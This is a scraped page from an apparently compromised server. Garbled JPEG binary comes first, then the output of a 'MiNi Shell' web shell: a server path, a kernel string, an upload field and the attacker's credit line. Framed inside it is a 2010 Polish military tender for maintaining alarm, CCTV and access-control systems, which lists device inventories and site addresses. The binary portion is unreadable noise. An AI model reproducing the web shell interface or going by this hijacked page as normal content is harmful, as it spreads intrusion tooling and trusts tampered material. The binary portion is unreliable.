JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100415/107368-N-2010.html

<p class="kh_header"><b>Legionowo: Usługi konserwacji systemów alarmowych.</b><br>
<b>Numer ogłoszenia: 107368 - 2010; data zamieszczenia: 15.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1237 , ul. Koszarowa 1, 05-119 Legionowo, woj. mazowieckie, tel. 022 6865848, faks 022 6865718.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi konserwacji systemów alarmowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi konserwacji systemów alarmowych w obiektach RWŁ Legionowo.
Część I obejmuje konserwację:
- systemu włamania i napadu (SWiN),
- systemu telewizji przemysowej (CCTV) i videofonu, 
- systemu kontroli dostępu(SKD) w budynku nr 7 w Legionowie przy 
  ul. Koszarowej 1.
Część II obejmuje konserwację
- systemu zabezpieczenia przed niepowołanym dostępem do infrastruktury telekomunikacyjnej w n/w obiektach:
1)	RWŁ Legionowo ul. Koszarowa 1 b.7,
2)	GWŁ: Białobrzegi ul. Osiedle Wojskowe,
3)	GWŁ Ciechanów ul. Wojska Polskiego 54 b.8,
4)	GWŁ  Kazuń, 
5)	GWŁ Mińsk Mazowiecki ul. Warszawska 267 b.3,
6)	GWŁ Przasnysz ul. Makowska 8, 
7)	GWŁ Ostrów Mazowiecka ul. Bociańskiego 1 b.10, 
8)	GWŁ Zegrze Płn. ul. Juzistek b.4 ,  
9)	GWŁ Siedlce ul. Składowa 39 b.40, 
10)	GWŁ Łomża  Al. Legionów 133 b. 12, 
11)	GWŁ Białystok  ul. Kawaleryjska 70 b.21..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.61.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 08.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DO CZĘŚCI 1:
1)Zamówienie zrealizują pracownicy Wykonawcy posiadający:
	licencje pracowników ochrony technicznej II stopnia - nadzór techniczny,
	licencje pracowników ochrony I stopnia - serwisanci
2)Zamówienie zrealizują pracownicy Wykonawcy:
	nadzór techniczny - osoby posiadające poświadczenia bezpieczeństwa osobowego o klauzuli TAJNE
	serwisanci przewidziani do wykonania przedmiotu zamówienia 
w pomieszczeniach specjalnych znajdujących się w strefie bezpieczeństwa klasy I 
- poświadczenia bezpieczeństwa osobowego o klauzuli minimum TAJNE
	serwisanci przewidziani do wykonania przedmiotu zamówienia w pomieszczeniach znajdujących się w strefie bezpieczeństwa klasy II i strefie administracyjnej - poświadczenia bezpieczeństwa osobowego o klauzuli minimum POUFNE
3)Posiadają aktualne Świadectwo Bezpieczeństwa Przemysłowego minimum III (trzeciego) stopnia o klauzuli minimum TAJNE
4)Zatrudniają Pełnomocnika ds. ochrony informacji niejawnych przeszkolonego przez służby ochrony państwa
5)Posiadają kancelarię tajną i pomieszczenia umożliwiające prowadzenie prac z niejawną dokumentacją dotyczącą systemów alarmowych (ochrony) obiektów wojskowych
6)Posiadają instalatorów i projektantów posiadających świadectwa ukończenia kursów w zakresie instalowania lub projektowania systemów alarmowych klasy SA4
7)Posiadają certyfikat lub świadectwo kwalifikacyjne na system lub poszczególne urządzenia alarmowe do instalacji w obiektach wojskowych
8)Prowadzą całodobowy dyżur serwisowy, który umożliwia skierowanie grupy serwisowej do obiektu Zamawiającego, w celu przystąpienia do usuwania awarii systemu alarmowego w czasie do 4 godz. od zgłoszenia;
       DO CZĘŚCI  2
1)Zamówienie zrealizują pracownicy Wykonawcy posiadający:
	licencje pracowników ochrony technicznej II stopnia - nadzór techniczny i serwisanci
2)Posiadają instalatorów i projektantów posiadających świadectwa ukończenia kursów w zakresie instalowania lub projektowania systemów alarmowych klasy SA2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zrealizowanie usług o podobnym charakterze w okresie ostatnich 3 lat,
  a jeżeli okres działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.licencje pracowników ochrony technicznej II stopnia - nadzór techniczny.
   2.licencje pracowników ochrony I stopnia - serwisanci.
   3.poświadczenie bezpieczeństwa osobowego o klauzuli TAJNE - nadzór techniczny.
4.poświadczenia bezpieczeństwa osobowego o klauzuli minimum TAJNE w strefie
  bezpieczeństwa klasy I - serwisanci.
5.poświadczenia bezpieczeństwa osobowego o klauzuli minimum POUFNE w strefie
  bezpieczeństwa klasy II i strefie administracyjnej - serwisanci.
6.świadectwo bezpieczeństwa przemysłowego minimum III stopnia o klauzul TAJNE
    DO CZĘŚCI  2
1)Zamówienie zrealizują pracownicy Wykonawcy posiadający:
licencje pracowników ochrony technicznej II stopnia - nadzór techniczny
 i serwisanci
2.Posiadają instalatorów i projektantów posiadających świadectwa ukończenia kursów w zakresie instalowania lub projektowania systemów alarmowych klasy SA2
3)Dokumenty, o których mowa należy złożyć w formie oryginałów, kopii poświadczonych za zgodność z oryginałem lub oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 1237
ul. Koszarowa 1 05-119 Legionowo
bud. nr 1 parter. pok 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2010 godzina 12:00, miejsce: Kancelaria Jednostki Wojskowej 1237 w Legionowie ul. Koszarowa 1
budynek nr 3 parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja:
- systemu włamania i napadu ?SWiN/, 
- systemu telewizji Przemysłowej /CCTV/,
- systemu kontroli dostepu /SKD/.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)elementy Systemu Włamania i Napadu (SWiN)  podlegające konserwacji:
1) Interfrejs drukarki ATS  - 2 szt.
2) Bateria BS 131N - 4 szt.
3) Bateria BS 129N - 5 szt.
4) Odbiornik OR2 (NOKTON) - 1 szt.
5) Centrala alarmowa ATS - 1 szt.
6) Transkoder NOKTON - 1 szt.
7) Zestaw komputerowy - 2 kpl.
8) Manipulator szyfrowy ATS - 7 szt.
9) Ehspander ATS - 9 szt.
10)Czujka Mikrofalowa - 6 szt.
11) Przycisk napadowy - 2 szt.
12) Przycisk pomocy medycznej - 2 szt.
13) Czujka kontaktronowa - 24 szt.


14) Czujka wstrząsowa - 4 szt.
15) Sygnalizator akustyczno - optyczny wewnętrzny - 1 szt.
16)  Sygnalizator optyczno - akustyczny z zasilaniem awaryjnym - 1 szt.
17) Czujka PIR - kurtyna poz. - 9 szt.
18) Czujka PIR - szerokokątna - 8 szt.
19) Nadajnik NR2 Multi (NOKTON) - 2 szt.
20) Izolator zwarć ATS - 1 szt.
b) elementy Systemu Telewizji Przemysłowej (CCTV ) i videomofonu  podlegające konserwacji:
1)	Akumulator 12V/40Ah - 4 szt.
2)	Moduł kamery URMET-MIWI - 1 szt.
3)	Zasilacz MIWI URMET - 1 szt.
4)	Videmonitor URMET-MIWI - 3 szt.
5)	Rejestrator cyfrowy 16 wejść video nagrywarka CD-R - 1 szt.
6)	Zasilacz (PALKO) - 4 szt.
7)	Kamera kolorowa  wewnętrzna - 1 szt.
8)	Kamera kolorowa  zewnętrzna - 3 szt.
9)	Monitor kolorowy LCD 19 - 1 szt.
10)	Podświetlacz diodowy - 4 szt.
11)	Adapter po transmisji po skrętce - 1 szt.
12)	Obudowa kamery z grzałką - 3 szt.
c) elementy  Systemu  Kontroli Dostępu (SKD) podlegające konserwacji:
1)	Pamięć ATS - 1 szt.
2)	Bateria BS 129N - 1 szt.
3)	Centrala alarmowa ATS - 1 szt.
4)	Manipulator szyfrowy ATS - 1 szt.
5)	Czujka kontraktonowa - 4 szt.
6)	Przycisk ewak. otwarcia drzwi - 4 szt.
7)	Akumulator 65 Ah - 3 szt.
8)	Zwora elektromagnetyczna - 4 szt.
9)	Samozamykacz - 4 szt.
10)	Kontroler ATS - 1 szt.
11)	Czytnik ATS - 8 szt.
12)	Programator kart ATS - 1 szt.
13)	Zestaw komputerowy   -  1 kpl.  
14)	Interfeis drukarki ATS - 1 szt.

UWAGA: Sprzęt podlegający konserwacji dla części 1 a, b, c  jest na gwarancji  
Szczegółowy wykaz urządzeń alarmowych, podlegających konserwacji z podziałem na rodzaje i ilości, będzie udostępniony w siedzibie Zamawiającego u Pełnomocnika ds. Ochrony Informacji Niejawnych po okazaniu przez Wykonawcę listy osób, które z ramienia Wykonawcy będą wykonywały prace konserwacyjne z udokumentowaniem posiadania przez te osoby poświadczeń bezpieczeństwa oraz stosownych licencji. Pracownicy Wykonawcy, których nie będzie na w/w liście nie będą dopuszczeni do prac  zawartych.


a)elementy Systemu Włamania i Napadu (SWiN)  podlegające konserwacji:
1) Interfrejs drukarki ATS  - 2 szt.
2) Bateria BS 131N - 4 szt.
3) Bateria BS 129N - 5 szt.
4) Odbiornik OR2 (NOKTON) - 1 szt.
5) Centrala alarmowa ATS - 1 szt.
6) Transkoder NOKTON - 1 szt.
7) Zestaw komputerowy - 2 kpl.
8) Manipulator szyfrowy ATS - 7 szt.
9) Ehspander ATS - 9 szt.
10)Czujka Mikrofalowa - 6 szt.
11) Przycisk napadowy - 2 szt.
12) Przycisk pomocy medycznej - 2 szt.
13) Czujka kontaktronowa - 24 szt.
14) Czujka wstrząsowa - 4 szt.
15) Sygnalizator akustyczno - optyczny wewnętrzny - 1 szt.
16)  Sygnalizator optyczno - akustyczny z zasilaniem awaryjnym - 1 szt.
17) Czujka PIR - kurtyna poz. - 9 szt.
18) Czujka PIR - szerokokątna - 8 szt.
19) Nadajnik NR2 Multi (NOKTON) - 2 szt.
20) Izolator zwarć ATS - 1 szt.
b) elementy Systemu Telewizji Przemysłowej (CCTV ) i videomofonu  podlegające konserwacji:
1)	Akumulator 12V/40Ah - 4 szt.
2)	Moduł kamery URMET-MIWI - 1 szt.
3)	Zasilacz MIWI URMET - 1 szt.
4)	Videmonitor URMET-MIWI - 3 szt.
5)	Rejestrator cyfrowy 16 wejść video nagrywarka CD-R - 1 szt.
6)	Zasilacz (PALKO) - 4 szt.
7)	Kamera kolorowa  wewnętrzna - 1 szt.
8)	Kamera kolorowa  zewnętrzna - 3 szt.
9)	Monitor kolorowy LCD 19 - 1 szt.
10)	Podświetlacz diodowy - 4 szt.
11)	Adapter po transmisji po skrętce - 1 szt.
12)	Obudowa kamery z grzałką - 3 szt.
c) elementy  Systemu  Kontroli Dostępu (SKD) podlegające konserwacji:
1)	Pamięć ATS - 1 szt.
2)	Bateria BS 129N - 1 szt.
3)	Centrala alarmowa ATS - 1 szt.
4)	Manipulator szyfrowy ATS - 1 szt.
5)	Czujka kontraktonowa - 4 szt.
6)	Przycisk ewak. otwarcia drzwi - 4 szt.
7)	Akumulator 65 Ah - 3 szt.
8)	Zwora elektromagnetyczna - 4 szt.
9)	Samozamykacz - 4 szt.
10)	Kontroler ATS - 1 szt.
11)	Czytnik ATS - 8 szt.
12)	Programator kart ATS - 1 szt.
13)	Zestaw komputerowy   -  1 kpl.  
14)	Interfeis drukarki ATS - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.61.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 08.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com